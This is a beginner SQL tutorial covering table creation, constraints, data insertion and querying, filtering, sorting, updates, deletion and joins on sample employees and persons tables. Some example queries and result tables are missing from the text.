SQL Statements
Part 1: Overview
SQL Statements
SQL statements are simple and read much like plain English, but they follow a specific syntax.
An SQL statement is composed of a sequence of keywords, identifiers, and other elements, terminated by a semicolon (;).
Here is an example of a valid SQL statement.
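As a minimal illustration, a complete statement might look like the sketch below. The employees table and its columns are borrowed from the examples later in this document, and the threshold 5000 is an arbitrary value chosen for illustration.

```sql
-- Keywords: SELECT, FROM, WHERE
-- Identifiers: emp_name, hire_date, salary, employees
SELECT emp_name, hire_date, salary
FROM employees
WHERE salary > 5000;
```

A statement may span several lines; everything up to the semicolon is treated as one statement.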
Use a semicolon at the end of an SQL statement: it terminates the statement and lets the client submit it to
the database server. Some database management systems do not require it, but using it is
considered a best practice.
SQL keywords are case-insensitive, which means SELECT is the same as select. Database and table
names, however, may be case-sensitive depending on the database system and the operating system. In
MySQL, for example, they are case-sensitive by default on Unix or Linux platforms, whereas on Windows they aren't.
SQL Comments
A comment is text that is ignored by the database engine. Comments can be used to provide a
quick hint about an SQL statement.
SQL supports single-line as well as multi-line comments. To write a single-line comment, start the line with
two consecutive hyphens (--).
To write a multi-line comment, start the comment with a slash followed by an asterisk (/*) and end
it with an asterisk followed by a slash (*/).
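Both comment styles can be sketched as follows. The employees table and the salary threshold are assumptions made only so the statements have something to refer to.

```sql
-- Select all the employees (single-line comment)
SELECT * FROM employees;

/* Select all the employees whose
   salary is greater than 5000 (multi-line comment) */
SELECT * FROM employees
WHERE salary > 5000;
```

Note that MySQL expects at least one space after the two hyphens, so writing "-- comment" rather than "--comment" is the safer habit.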
Part 2: Database Commands
Creating a Database
CREATE DATABASE database_name;
Creating a database does not select it for use, so before moving further you must select the
target database with the USE statement. For example, the USE demo; command sets the demo database
as the target database for all subsequent commands.
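Put together, the two steps might look like this. It is a sketch that assumes a MySQL or SQL Server session and that no database named demo exists yet.

```sql
-- Create a database named demo
CREATE DATABASE demo;

-- Make demo the default database for the statements that follow
USE demo;
```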
SQL CREATE TABLE Statement
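The basic syntax for creating a table can be given with:
CREATE TABLE table_name (
    column1_name data_type constraints,
    column2_name data_type constraints,
    ....
);
For example, the following statement creates a table named persons with four columns:
CREATE TABLE persons (
    id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
    name VARCHAR(50) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL UNIQUE
);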
The data types available for columns vary depending on the database system. For example, MySQL and
SQL Server support the INT data type for integer values, whereas Oracle Database
supports the NUMBER data type.
The following table summarizes the most commonly used data types supported by MySQL.
TIMESTAMP    Stores timestamp values. TIMESTAMP values are stored as the number of seconds since
             the Unix epoch ('1970-01-01 00:00:00' UTC).
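There are a few additional constraints (also called modifiers) that are set for the table columns in the
preceding statement. Constraints define rules regarding the values allowed in columns.
The NOT NULL constraint ensures that the field cannot accept a NULL value.
The PRIMARY KEY constraint marks the corresponding field as the table's primary key.
The AUTO_INCREMENT attribute is a MySQL extension that automatically assigns a value to the field when none is specified.
The UNIQUE constraint ensures that every row holds a different value in that column.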
Note: Microsoft SQL Server uses the IDENTITY property to provide the auto-increment feature. The
default is IDENTITY(1,1), which means the seed (starting value) is 1 and the increment is
also 1.
You can execute the command DESC table_name; to see the column information or structure of any table
in MySQL and Oracle Database, or EXEC sp_columns table_name; in SQL Server (replace
table_name with the actual table name).
If you try to create a table that already exists in the database, you'll get an error message. To avoid
this in MySQL, you can use the optional IF NOT EXISTS clause, as follows:
CREATE TABLE IF NOT EXISTS persons (
    id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
    name VARCHAR(50) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL UNIQUE
);
If you want to see the list of tables inside the currently selected database, you can execute the SHOW
TABLES; statement on the MySQL command line.
What is a Constraint?
A constraint is simply a restriction placed on one or more columns of a table to limit the type of values that
can be stored in that column. Constraints provide a standard mechanism to maintain the accuracy and
integrity of the data inside a database table.
The most commonly used constraints, each described below, are:
NOT NULL
PRIMARY KEY
UNIQUE
DEFAULT
FOREIGN KEY
CHECK
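NOT NULL Constraint
The NOT NULL constraint specifies that a column does not accept NULL values.
This means that if the NOT NULL constraint is applied to a column, you cannot insert a new row in the table
without adding a non-NULL value for that column.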
The following SQL statement creates a table named persons with four columns, out of which three
columns, id, name and phone do not accept NULL values.
CREATE TABLE persons (
    id INT NOT NULL,
    name VARCHAR(30) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL
);
A null value or NULL is different from zero (0), blank, or a zero-length character string such
as ''. NULL means that no entry has been made.
PRIMARY KEY Constraint
The PRIMARY KEY constraint identifies the column or set of columns whose values uniquely
identify a row in a table. No two rows in a table can have the same primary key value. Also, you cannot
enter a NULL value in a primary key column.
The following SQL statement creates a table named persons and specifies the id column as the primary
key. That means this field does not allow NULL or duplicate values.
CREATE TABLE persons (
    id INT NOT NULL PRIMARY KEY,
    name VARCHAR(30) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL
);
The primary key typically consists of one column in a table, although more than one column can together
comprise the primary key. Choose a column whose values are naturally unique: for an employee table, for
example, either the employee's email address or an assigned identification number is a logical primary key.
UNIQUE Constraint
The UNIQUE constraint restricts one or more columns to contain unique values within a table.
The following SQL statement creates a table named persons and specifies the phone column as unique.
That means this field does not allow duplicate values.
CREATE TABLE persons (
    id INT NOT NULL PRIMARY KEY,
    name VARCHAR(30) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL UNIQUE
);
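DEFAULT Constraint
The DEFAULT constraint specifies the default value for a column.
A column default is a value that the database engine inserts in the column when
an INSERT statement doesn't explicitly assign a particular value.
The following SQL statement creates a default for the country column.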
CREATE TABLE persons (
    id INT NOT NULL PRIMARY KEY,
    name VARCHAR(30) NOT NULL,
    birth_date DATE,
    phone VARCHAR(15) NOT NULL UNIQUE,
    country VARCHAR(30) NOT NULL DEFAULT 'Australia'
);
If you define a table column as NOT NULL, but assign the column a default value, then in
the INSERT statement you don't need to explicitly assign a value for that column in order to insert a new
row in the table.
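To see the default in action, you could insert a row without mentioning the country column. This is only a sketch: it assumes the persons table defined just above, and the name, date, and phone number are hypothetical sample values.

```sql
-- country is omitted from the column list, so the engine stores 'Australia'
INSERT INTO persons (id, name, birth_date, phone)
VALUES (1, 'Peter Wilson', '1990-07-15', '0711-020361');

-- Check the stored row, including the defaulted country value
SELECT id, name, country FROM persons WHERE id = 1;
```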
FOREIGN KEY Constraint
A foreign key (FK) is a column or combination of columns that is used to establish and enforce a
relationship between the data in two tables.
In MySQL you can create a foreign key by defining a FOREIGN KEY constraint when you create a table,
as follows. The following statement establishes a foreign key on the dept_id column of the employees table
that references the dept_id column of the departments table.
CREATE TABLE employees (
    emp_id INT NOT NULL PRIMARY KEY,
    emp_name VARCHAR(55) NOT NULL,
    hire_date DATE NOT NULL,
    salary INT,
    dept_id INT,
    FOREIGN KEY (dept_id) REFERENCES departments(dept_id)
);
CHECK Constraint
The CHECK constraint restricts the values that can be placed in a column.
For example, the range of values for a salary column can be limited by creating a CHECK constraint that
allows values only from 3,000 to 10,000. This prevents salaries from being entered outside the regular
salary range. Here's an example:
CREATE TABLE employees (
    emp_id INT NOT NULL PRIMARY KEY,
    emp_name VARCHAR(55) NOT NULL,
    hire_date DATE NOT NULL,
    salary INT NOT NULL CHECK (salary >= 3000 AND salary <= 10000),
    dept_id INT,
    FOREIGN KEY (dept_id) REFERENCES departments(dept_id)
);
Note: MySQL versions before 8.0.16 do not enforce CHECK constraints. In those versions the CHECK clause
is parsed but ignored by all storage engines. MySQL 8.0.16 and later enforce it.
SQL INSERT Statement
Now it's time to insert some data into our newly created database table.
Syntax
The basic syntax for inserting data into a table can be given with:
INSERT INTO table_name (column1,column2,...) VALUES (value1,value2,...);
Here column1, column2, and so on represent the names of the table columns, whereas
value1, value2, and so on represent the corresponding values for these columns.
Notice that the INSERT statements in this section don't supply a value for the id field. As you may remember from the create
table chapter, the id field was marked with the AUTO_INCREMENT flag, which tells MySQL to automatically
assign a value to this field if it is left unspecified.
Non-numeric values like strings and dates must always be surrounded by quotes, whereas numeric
values should not be enclosed within quotes. Also, if the string itself contains a quote, you must
escape it. In MySQL you can do so with a backslash, as in 'Let\'s go'.
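The two common ways of escaping a quote inside a string can be compared with a quick sketch. The column alias greeting is just an illustrative name.

```sql
-- Doubling the quote is the standard SQL way to embed a single quote
SELECT 'Let''s go' AS greeting;

-- Backslash escaping works in MySQL unless the NO_BACKSLASH_ESCAPES SQL mode is enabled
SELECT 'Let\'s go' AS greeting;
```

The doubled-quote form is the more portable choice if the same script may run on other database systems.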
INSERT INTO persons (name, birth_date, phone)
VALUES ('Carrie Simpson', '1995-05-01', '0251-031259');
INSERT INTO persons (name, birth_date, phone)
VALUES ('Victoria Ashworth', '1996-10-17', '0695-346721');
You can confirm that the new rows were added by selecting the records from the persons table.
SQL SELECT Statement
In the previous chapter we learned how to insert data into a database table. Now it's time to select
data from existing tables using an SQL query.
The SELECT statement is used to select or retrieve the data from one or more tables. You can use this
statement to retrieve all the rows from a table in one go, as well as to retrieve only those rows that satisfy
a certain condition or a combination of conditions.
The basic syntax for selecting the data from a table can be given with:
SELECT column1_name, column2_name, columnN_name FROM table_name;
Here, column1_name, column2_name, ... are the names of the columns or fields of a database table
whose values you want to fetch. However, if you want to fetch the values of all the columns available in a
table, you can just use the following syntax:
SELECT * FROM table_name;
The examples that follow use an employees table with the columns emp_id, emp_name, hire_date, salary, and dept_id.
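To try the queries in this part yourself, you need some data to work with. The script below is only a sketch: the column types follow the CREATE TABLE employees statement shown earlier (without the foreign key, so that it runs on its own), and the five rows are hypothetical sample values.

```sql
-- Hypothetical sample table for experimenting with the SELECT examples
CREATE TABLE employees (
    emp_id INT NOT NULL PRIMARY KEY,
    emp_name VARCHAR(55) NOT NULL,
    hire_date DATE NOT NULL,
    salary INT,
    dept_id INT
);

-- Hypothetical rows; any values of the right types would do
INSERT INTO employees (emp_id, emp_name, hire_date, salary, dept_id) VALUES
    (1, 'Ethan Hunt', '2001-05-01', 5000, 4),
    (2, 'Tony Montana', '2002-07-15', 6500, 1),
    (3, 'Sarah Connor', '2005-10-18', 8000, 5),
    (4, 'Rick Deckard', '2007-01-03', 7200, 3),
    (5, 'Martin Blank', '2008-06-24', 5600, NULL);
```

The multi-row VALUES list is accepted by MySQL and SQL Server; on a system that does not support it, one INSERT statement per row does the same job.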
The following statement will return all the rows from the employees table.
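A minimal sketch of that statement, assuming an employees table exists in the selected database:

```sql
-- The asterisk selects every column; with no WHERE clause every row is returned
SELECT * FROM employees;
```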
As you can see, it returns all the rows and columns from the employees table.
Tip: The asterisk (*) is a wildcard character that means everything. For example, the asterisk character in
the SELECT statement of the example above is a shorthand substitute for all the columns of
the employees table.
Select Columns from Table
If you don't require all the data, you can select specific columns, like this:
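For instance, the following sketch lists every column of the employees table except dept_id. The column names are the ones used throughout this document.

```sql
-- Name the wanted columns explicitly instead of using the asterisk
SELECT emp_id, emp_name, hire_date, salary
FROM employees;
```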
As you can see this time there is no dept_id column in the result set. In the next chapter we'll learn how to
select the records from a table based on a condition.
SQL WHERE Clause
The WHERE clause is used with the SELECT, UPDATE, and DELETE statements. This part covers its use with
SELECT; you'll see it used with the other statements in upcoming parts.
Syntax
The WHERE clause is used with the SELECT statement to extract only those records that fulfill specified
conditions. The basic syntax can be given with:
SELECT column_list FROM table_name WHERE condition;
SELECT * FROM table_name WHERE condition;
Now, let's check out some examples that demonstrate how it actually works.
Suppose we have a table called employees in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
The following SQL statement will return all the employees from the employees table whose salary is
greater than 7000. The WHERE clause simply filters out the unwanted data.
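A minimal sketch of such a statement, assuming the employees table has a numeric salary column:

```sql
-- Keep only the rows whose salary exceeds 7000
SELECT * FROM employees
WHERE salary > 7000;
```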
As you can see the output contains only those employees whose salary is greater than 7000. Similarly,
you can fetch records from specific columns, like this:
SELECT emp_id, emp_name, hire_date, salary FROM employees WHERE salary > 7000;
The following statement will fetch the records of an employee whose employee id is 2.
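Assuming emp_id is the primary key of the employees table, that statement can be sketched as:

```sql
-- emp_id is unique, so at most one row can match
SELECT * FROM employees
WHERE emp_id = 2;
```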
This time we got only one row in the output, because emp_id is unique for every employee.
Operators Allowed in WHERE Clause
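SQL supports a number of different operators that can be used in the WHERE clause. Some of the most important
ones are summarized in the following table.
+----------+-------------------------------------------------------------------------+--------------------------------+
| Operator | Description                                                             | Example                        |
+----------+-------------------------------------------------------------------------+--------------------------------+
| =        | Equal                                                                   | WHERE id = 2                   |
| IN       | Check whether a specified value matches any value in a list or subquery | WHERE country IN ('USA', 'UK') |
| BETWEEN  | Check whether a specified value is within a range of values             | WHERE rating BETWEEN 3 AND 5   |
+----------+-------------------------------------------------------------------------+--------------------------------+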
AND OR Operators
In the previous chapter we learned how to fetch records from a table using a single condition with
the WHERE clause. But sometimes you need to filter records based on multiple conditions, like selecting
users whose age is greater than 30 and whose country is the United States, or selecting products whose price is
lower than 100 dollars and whose rating is greater than 4.
The AND Operator
The AND operator is a logical operator that combines two conditions and returns TRUE only if both
conditions evaluate to TRUE. The AND operator is often used in the WHERE clause of
the SELECT, UPDATE, and DELETE statements to form conditions that filter the result set.
SELECT column1_name, column2_name, columnN_name
FROM table_name
WHERE condition1 AND condition2;
Let's check out some examples that demonstrate how it actually works.
Suppose we have a table called employees in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
Using WHERE Clause with AND Operator
The following SQL statement will return only those employees from the employees table whose salary is
greater than 7000 and the dept_id is equal to 5.
Example
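A sketch of the statement described above, assuming the employees table with salary and dept_id columns:

```sql
-- Both conditions must be true for a row to be returned
SELECT * FROM employees
WHERE salary > 7000 AND dept_id = 5;
```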
The OR Operator
Similarly, the OR operator is also a logical operator that combines two conditions, but it
returns TRUE when either of the conditions is TRUE.
The following SQL statement will return all the employees from the employees table whose salary is
either greater than 7000 or the dept_id is equal to 5.
Example
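The same two conditions joined with OR instead, again as a sketch against the employees table:

```sql
-- A row is returned when at least one of the conditions is true
SELECT * FROM employees
WHERE salary > 7000 OR dept_id = 5;
```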
Combining AND & OR Operator
You can also combine AND and OR to create complex conditional expressions.
The following SQL statement will return all the employees whose salary is greater than 5000 and
whose dept_id is equal to either 1 or 5.
Example
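One way to write the combined condition is sketched below. The parentheses matter: AND binds more tightly than OR, so without them the query would return every employee in department 5 regardless of salary.

```sql
-- salary must exceed 5000, and dept_id must be 1 or 5
SELECT * FROM employees
WHERE salary > 5000 AND (dept_id = 1 OR dept_id = 5);
```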
Range and Membership Conditions
To check whether a value lies within a range or within a set of values, you can use the BETWEEN and IN
operators. They let you define an inclusive range or a set of values directly, rather than
combining separate conditions.
The IN Operator
The IN operator is a logical operator that is used to check whether a particular value exists within a set of
values. Its basic syntax can be given with:
SELECT column_list FROM table_name WHERE column_name IN (value1, value2, ...);
Here, column_list are the names of columns/fields like name, age, country etc. of a database table whose
values you want to fetch. Well, let's check out some examples.
Consider an employees table in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
The following SQL statement will return only those employees whose dept_id is either 1 or 3.
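A sketch of that statement, assuming dept_id is a numeric column of the employees table:

```sql
-- Equivalent to: dept_id = 1 OR dept_id = 3
SELECT * FROM employees
WHERE dept_id IN (1, 3);
```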
Similarly, you can use the NOT IN operator, which is the exact opposite of IN. The following SQL
statement will return all the employees except those whose dept_id is 1 or 3.
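The negated form can be sketched the same way, under the same assumptions about the employees table:

```sql
-- Returns the rows whose dept_id is neither 1 nor 3
SELECT * FROM employees
WHERE dept_id NOT IN (1, 3);
```

Keep in mind that a row whose dept_id is NULL is not returned by this query, because a comparison with NULL is never true.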
The BETWEEN Operator
Sometimes you want to select a row if the value in a column falls within a certain range. This type of
condition is common when working with numeric data.
To perform a query based on such a condition, you can use the BETWEEN operator. It is a logical
operator that allows you to specify a range to test, as follows:
SELECT column1_name, column2_name, columnN_name
FROM table_name
WHERE column_name BETWEEN min_value AND max_value;
The following SQL statement will return only those employees from the employees table, whose salary
falls within the range of 7000 and 9000.
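A sketch of that range query, assuming a numeric salary column:

```sql
-- BETWEEN is inclusive: salaries of exactly 7000 and 9000 also match
SELECT * FROM employees
WHERE salary BETWEEN 7000 AND 9000;
```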
When using the BETWEEN operator with date or time values, use the CAST() function to explicitly
convert the values to the desired data type for best results. For example, if you use a string such as
'2016-12-31' in a comparison with a DATE, cast the string to a DATE.
The following SQL statement selects all the employees who were hired between 1st January 2006
(i.e. '2006-01-01') and 31st December 2016 (i.e. '2016-12-31'):
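The date range described above might be written as follows. This is a sketch that assumes hire_date is a DATE column and that the database supports CAST(... AS DATE), as MySQL does.

```sql
-- Cast both string literals to DATE before comparing them with hire_date
SELECT * FROM employees
WHERE hire_date BETWEEN CAST('2006-01-01' AS DATE)
                    AND CAST('2016-12-31' AS DATE);
```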
While ranges of dates and numbers are most common, you can also build conditions that search for
ranges of strings. The following SQL statement selects all the employees whose names begin with any
of the letters between 'O' and 'Z':
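A sketch of such a string range, assuming emp_name is a character column:

```sql
-- Strings are compared in the column's collation order
SELECT * FROM employees
WHERE emp_name BETWEEN 'O' AND 'Z';
```

One subtlety worth knowing: a name such as 'Zoe' sorts after the single letter 'Z', so names that start with Z and have more characters fall outside this range.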
SQL ORDER BY Clause
Generally when you use the SELECT statement to fetch data from a table, the rows in result set are not in
any particular order. If you want your result set in a particular order, you can specify the ORDER BY
clause at the end of the statement which tells the server how to sort the data returned by the query. The
default sorting order is ascending.
Syntax
The ORDER BY clause is used to sort the data returned by a query in ascending or descending order.
The basic syntax of this clause can be given with:
SELECT column_list FROM table_name ORDER BY column_name ASC|DESC;
Here, column_list are the names of columns/fields like name, age, country etc. of a database table whose
values you want to fetch, whereas the column_name is name of the column you want to sort. Let's check
out some examples that demonstrate how it actually works.
Consider an employees table in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
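As a first sketch, the rows of the employees table could be sorted by name with an explicit ASC keyword. The choice of emp_name as the sort column is an assumption made for illustration.

```sql
-- Sort the result set alphabetically by employee name, A to Z
SELECT * FROM employees
ORDER BY emp_name ASC;
```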
Because the default sorting order is ascending, you can skip the ASC option. The following statement
sorts the result set by the emp_name column in ascending order, exactly as it would with an explicit ASC:
SELECT * FROM employees
ORDER BY emp_name;
Similarly, you can use the DESC option to sort in descending order. The following statement
orders the result set by the numeric salary column in descending order.
SELECT * FROM employees
ORDER BY salary DESC;
You can also specify multiple columns while sorting. However, the effect on the result set is visible only
when the first sort column contains duplicate values.
To understand multi-column sorting, assume that we have a table named trainees in our database in which
some first names are repeated: the trainees "Peter Parker" and "Peter Pan" have different full names,
but their first names are the same.
Now execute the following command, which orders the result set by the first_name column.
SELECT * FROM trainees
ORDER BY first_name;
Now execute this statement which orders the result set by first_name and last_name columns.
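A sketch of the two-column sort, assuming the trainees table has first_name and last_name columns:

```sql
-- Rows are sorted by first_name; ties are then ordered by last_name
SELECT * FROM trainees
ORDER BY first_name, last_name;
```

With this ordering, "Peter Pan" is listed before "Peter Parker", because the last names are compared once the first names are found to be equal.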
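SQL TOP / MySQL LIMIT Clause
Sometimes you need only a limited number of rows from a query, for example the first few rows of a large
result set. To handle such situations, you can use SQL's TOP clause in your SELECT statement. However, the TOP
clause is only supported by the SQL Server and MS Access database systems.
MySQL provides an equivalent LIMIT clause, whereas Oracle provides the ROWNUM pseudocolumn, which can be
used in a SELECT statement to restrict the number of rows returned by a query.
The SQL TOP clause is used to limit the number of rows returned. Its basic syntax is:
SELECT TOP number column_list FROM table_name;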
Here, column_list is a comma separated list of column or field names of a database table (e.g. name,
age, country, etc.) whose values you want to fetch. Let's see how it works.
Suppose we have an employees table in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
The following statement returns the three highest-paid employees from the employees table.
-- Syntax for SQL Server Database
SELECT TOP 3 * FROM employees
ORDER BY salary DESC;
You can optionally use the PERCENT keyword after the fixed value in a TOP clause, if you just want to
retrieve the percentage of rows instead of fixed number of rows. Fractional values are rounded up to the
next integer value (e.g. 1.5 rounded to 2).
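A sketch of the PERCENT form for SQL Server follows. The figure 30 is an arbitrary value chosen for illustration.

```sql
-- Syntax for SQL Server Database
-- Return the highest-paid 30 percent of the employees
SELECT TOP 30 PERCENT * FROM employees
ORDER BY salary DESC;
```

With a five-row table, 30 percent is 1.5 rows, which is rounded up to 2.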
MySQL LIMIT Clause
MySQL's LIMIT clause does the same job as the TOP clause: it restricts the number of rows returned by a
SELECT statement. It is written at the end of the statement and can be used to return the three
highest-paid employees from the employees table.
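A sketch of the MySQL version of the top-three query, assuming the employees table with a salary column:

```sql
-- Syntax for MySQL Database
-- Sort by salary from highest to lowest, then keep the first three rows
SELECT * FROM employees
ORDER BY salary DESC
LIMIT 3;
```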
The LIMIT clause also accepts an optional second parameter. When two parameters are specified, the first
parameter specifies the offset of the first row to return (the starting point), whereas the second
parameter specifies the maximum number of rows to return. The offset of the initial row is 0 (not 1).
So, if you want to find out the third-highest paid employee, you can do the following:
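A sketch of that query in MySQL, using an offset of 2 to skip the two highest-paid employees:

```sql
-- LIMIT offset, row_count: skip 2 rows, then return 1 row
SELECT * FROM employees
ORDER BY salary DESC
LIMIT 2, 1;
```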
SQL DISTINCT Clause
When fetching data from a database table, the result set may contain duplicate rows or values. If you
want to remove these duplicate values, you can specify the keyword DISTINCT directly after the SELECT
keyword.
Syntax
The DISTINCT clause is used to remove duplicate rows from the result set:
SELECT DISTINCT column_list FROM table_name;
Here, column_list is a comma separated list of column or field names of a database table (e.g. name,
age, country, etc.) whose values you want to fetch.
Let's check out some examples that demonstrate how it actually works.
Suppose we have a customers table in our database that includes a city column.
Now execute the following statement which returns all the rows from the city column of this table.
SELECT city FROM customers;
+-----------+
| city |
+-----------+
| Berlin |
| Madrid |
| Paris |
| Turin |
| Portland |
| Madrid |
+-----------+
If you look at the output carefully, you'll find that the city "Madrid" appears two times in our result set. That is
not what we want when we only need to know which cities occur. Let's fix this problem with DISTINCT.
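A sketch of the corrected query, assuming the same customers table and city column as above:

```sql
-- DISTINCT collapses repeated city values into a single row each
SELECT DISTINCT city FROM customers;
```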
After executing the above command, you'll get the output something like this:
+-----------+
| city |
+-----------+
| Berlin |
| Madrid |
| Paris |
| Turin |
| Portland |
+-----------+
As you can see, this time there are no duplicate values in our result set.
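SQL UPDATE Statement
The UPDATE statement is used to update existing data in a table.
Syntax
UPDATE table_name
SET column1_name = value1, column2_name = value2, ...
WHERE condition;
Here, column1_name, column2_name, ... are the names of the columns or fields of a database table
whose values you want to update. You can also combine multiple conditions using the AND or OR
operators that you learned about in the previous chapters.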
The WHERE clause in the UPDATE statement specifies which record or records should be updated. If
you omit the WHERE clause, all the records will be updated.
Let's check out some examples that demonstrate how it actually works.
Suppose we have an employees table in our database, with the columns emp_id, emp_name, hire_date, salary, and dept_id.
The following statement updates the emp_name field of the employee whose emp_id is 3.
UPDATE employees
SET emp_name = 'Sarah Ann Connor' -- illustrative value
WHERE emp_id = 3;
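Similarly, you can update multiple columns at once by separating the column and value pairs with commas.
UPDATE employees
SET salary = 6000, dept_id = 2 -- illustrative values
WHERE emp_id = 5;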
SQL DELETE Statement
Just as you insert records into a table with the INSERT statement, you can delete records from a table
with the DELETE statement.
Syntax
The DELETE statement is used to remove one or more rows from a table.
DELETE FROM table_name WHERE condition;
Warning: The WHERE clause in the DELETE statement specifies which record or records should be
deleted. It is however optional, but if you omit or forget the WHERE clause, all the records will be deleted
permanently from the table.
Let's delete some records from the persons table that we created in the create table chapter.
To delete only specific rows, add a WHERE clause with a condition that identifies them. Rows that do not
match the condition are left untouched.
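A conditional delete might look like the sketch below. The condition id > 3 is a hypothetical choice made for illustration; any condition valid in a WHERE clause can be used.

```sql
-- Remove only the rows whose id is greater than 3; all other rows stay
DELETE FROM persons
WHERE id > 3;
```

Running a SELECT with the same WHERE clause first is a simple way to preview which rows would be removed.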
Similarly, as mentioned above if you do not specify the WHERE clause in the DELETE statement all the
rows from the table will be deleted. However, the target table itself won't be deleted that means the table
structure, attributes, and indexes will remain intact.
The following statement will remove all the records from the persons table:
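A sketch of that statement, assuming the persons table from the create table chapter:

```sql
-- No WHERE clause: every row is deleted, but the table itself remains
DELETE FROM persons;
```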
SQL TRUNCATE TABLE Statement
The TRUNCATE TABLE statement removes all the rows from a table more quickly than a DELETE.
Logically, TRUNCATE TABLE is similar to the DELETE statement with no WHERE clause.
The TRUNCATE TABLE statement removes all the rows from a table, but the table structure and its
columns, constraints, indexes, and so on remain intact. To remove the table definition in addition to its
data, you can use the DROP TABLE statement.
Syntax
TRUNCATE TABLE table_name;
Consider an employees table in our database that currently holds several records.
The following command removes all the rows from the employees table:
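A sketch of that command, assuming an employees table exists in the selected database:

```sql
-- Remove every row from employees while keeping the table definition
TRUNCATE TABLE employees;
```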
Now, after executing the above SQL statement, if you try to select the records from the employees table,
you will get an empty result set.
The TRUNCATE TABLE statement drops and re-creates the table in such a way that any
auto-increment value is reset to its start value, which is generally 1.
DELETE lets you filter which rows to delete with an optional WHERE clause, whereas
TRUNCATE TABLE doesn't support a WHERE clause; it just removes all the rows.
TRUNCATE TABLE is faster and uses fewer system resources than DELETE, because DELETE scans
the table to generate a count of the affected rows, then deletes the rows one by one and records an
entry in the database log for each deleted row, while TRUNCATE TABLE just deletes all the rows without
providing any additional information.
Note: Use TRUNCATE TABLE if you just want to delete all the rows and re-create the whole table. Use
DELETE if you want to delete a limited number of rows based on a specific condition, or if you don't want
to reset the auto-increment value.
You can use the DROP TABLE statement to easily delete the database tables that you no longer need.
The DROP TABLE statement permanently erases all data from the table, as well as the metadata that
defines the table in the data dictionary.
Syntax
The DROP TABLE statement removes one or more tables. The syntax can be given with:
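A sketch of the general form, with placeholder table names:

```sql
-- table1_name, table2_name, ... are placeholders; list one or more tables
DROP TABLE table1_name, table2_name, ...;
```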
Here, table1_name, table2_name, ... are the names of the tables that you want to delete.
Note: Dropping a database or table is irreversible. So, be careful while using the DROP statement,
because database systems generally do not display any alert like "Are you sure?". They immediately
delete the database or table and all of its data.
Let's try to remove a database table using the DROP TABLE statement.
As you may remember from the CREATE TABLE chapter, we created a persons table in our demo database. The
following statement will remove this table permanently from the database.
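For the persons table, the statement takes this form:

```sql
-- Permanently removes the persons table and all of its data.
DROP TABLE persons;
```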
After executing the above command, if you try to perform any operation on the persons table, like
selecting the records from it, you'll get an error message.
Removing Database
Similarly, you can delete a database using the DROP DATABASE statement. The following command will
permanently remove the demo database from the database server.
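For the demo database, the command takes this form:

```sql
-- Permanently removes the demo database and every table in it.
DROP DATABASE demo;
```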
Now if you try to select the demo database using the USE demo; statement, you'll get an error message
saying "Unknown database" or "Database does not exist".
Part 3: Joins
To understand this easily, let's look at the following employees and departments tables. Here, the dept_id
column of the employees table is the foreign key to the departments table. Therefore, these two tables
can be joined to get the combined data.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name        |
+---------+------------------+
|       1 | Administration   |
|       2 | Customer Service |
|       3 | Finance          |
|       4 | Human Resources  |
|       5 | Sales            |
+---------+------------------+
Table: departments
To join tables, the data in the columns used for joining should match; the column names themselves
do not need to match.
When you join tables, the type of join that you create in your query affects the rows that appear in the
result set. You can create the following types of joins:
Inner Join
A join that returns only those rows that have a match in both joined tables. For example, you can join the
employees and departments tables to create a result set that shows the department name for each
employee. In an inner join, employees for which there is no department information are not included in the
result set, nor are departments with no employees.
The INNER JOIN is the most common type of join.
Now, let's say you need to retrieve the id, name, hire date, and department name of only those
employees who are assigned to a particular department. In a real-life scenario there may be some
employees who are not yet assigned to a department, like the fifth employee "Martin Blank" in our
employees table. But the question here is how to retrieve the data from both tables in the same SQL
query.
If you see the employees table, you'll notice that it has a column named dept_id which holds the ID of the
department to which each employee is assigned i.e. in technical terms, the employees table's dept_id
column is the foreign key to the departments table, and therefore we will use this column as a bridge
between these two tables.
Here's an example that retrieves the employee's id, name, hiring date and their department by joining the
employees and departments tables together using the common dept_id column. It excludes those
employees who are not assigned to any department.
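SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 INNER JOIN departments AS t2
ON t1.dept_id = t2.dept_id
ORDER BY emp_id;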
Note: When joining tables, prefix each column name with the name of the table it belongs to (e.g.
employees.dept_id, departments.dept_id, or t1.dept_id, t2.dept_id if you're using the table aliases) in
order to avoid confusion and ambiguous column error in case columns in different tables have the same
name.
To save time, you can use table aliases in the query instead of typing the long table names. For example,
you can give the employees table the alias t1 and refer to its column emp_name using t1.emp_name
instead of employees.emp_name.
After executing the above command, you get the result set something like this:
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
As you can see, the result set contains only those employees for which the dept_id value is present and
that value also exists in the dept_id column of the departments table.
Outer join
Outer joins are an extension to inner joins. An outer join returns the rows even if they don't have related
rows in the joined table. There are three types of outer joins: left outer join (or left join), right outer join (or
right join), and full outer join (or full join).
A LEFT JOIN statement returns all rows from the left table along with the rows from the right table for
which the join condition is met. Left join is a type of outer join, which is why it is also referred to as a left outer
join. Other variations of outer join are right join and full join.
Note: An outer join is a join that includes rows in a result set even though there may not be a match
between rows in the two tables being joined.
Now, let's say you want to retrieve the id, name and hire date of all the employees along with the name of
their department, irrespective of whether they are assigned to any department or not. To get this type of
result set, we need to apply a left join.
The following statement retrieves employee's id, name, hiring date and their department name by joining
the employees and departments tables together using the common dept_id field. It also includes those
employees who are not assigned to a department.
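A sketch of such a statement, reusing the column names and the t1/t2 aliases from the inner join example (the exact select list and ordering are assumed):

```sql
-- t1 = employees (left table), t2 = departments (right table).
-- Employees without a matching department are kept; dept_name is NULL for them.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 LEFT JOIN departments AS t2
ON t1.dept_id = t2.dept_id
ORDER BY emp_id;
```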
